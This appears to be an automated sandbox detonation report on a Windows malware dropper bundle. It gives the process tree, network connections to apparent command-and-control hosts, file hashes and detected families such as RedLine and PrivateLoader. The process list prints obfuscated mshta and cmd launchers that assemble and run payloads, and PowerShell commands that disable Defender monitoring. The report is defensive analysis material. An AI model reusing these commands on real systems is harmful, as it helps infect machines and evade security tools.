C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 272
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$601E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp" /SL5="$3018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 456
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49262 | | tcp |
| N/A | 127.0.0.1:49264 | | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P156RKKE6NHSISTNHGDL.temp
C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp
C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\idp.dll
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libwinpthread-1.dll
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2056 set thread context of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f7871e5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f78aa43.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78aa43.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7871e5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
